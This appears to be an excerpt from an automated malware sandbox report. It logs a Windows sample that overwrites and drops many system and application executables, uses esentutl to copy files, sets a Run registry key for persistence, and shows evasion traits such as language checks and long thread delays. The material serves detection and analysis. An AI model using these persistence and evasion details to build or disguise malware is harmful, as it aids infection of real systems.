                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\7z.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\AppVClient.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\SysWOW64\perfhost.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\7zG.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\msiexec.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile created: C:\Windows\System32\Locator.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\VSSVC.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\wbengine.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\wbem\WmiApSrv.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\SearchIndexer.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\AppVClient.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\FXSSVC.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\TieringEngineService.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\vds.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\alg.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\SysWOW64\perfhost.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\msiexec.exe
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, File created: C:\Windows\System32\sppsvc.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\SensorDataService.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\msdtc.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                Boot Survival

                Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\alpha.pif
                Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\xpha.pif
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Code function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,30_2_1002CBD0
                Source: C:\Users\user\AppData\Local\Temp\x.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jwsmvmdw
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_02B0AB1C
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\System32\AppVClient.exe, Code function: 22_2_007252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 22_2_007252A0
                Source: C:\Windows\System32\FXSSVC.exe, Code function: 25_2_009452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_009452A0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Code function: 28_2_022952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 28_2_022952A0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Memory allocated: 20CD0000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Memory allocated: 20FC0000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Memory allocated: 20D10000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Memory allocated: 26770000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Memory allocated: 269E0000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Memory allocated: 1E800000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Memory allocated: 1ED40000 memory reserve | memory write watch
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Code function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9,12_1_004019F0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Thread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Window / User API: threadDelayed 5124
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Window / User API: threadDelayed 4310
                Source: C:\Windows\System32\msdtc.exe, Window / User API: threadDelayed 484
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Windows\System32\vds.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Windows\System32\TieringEngineService.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
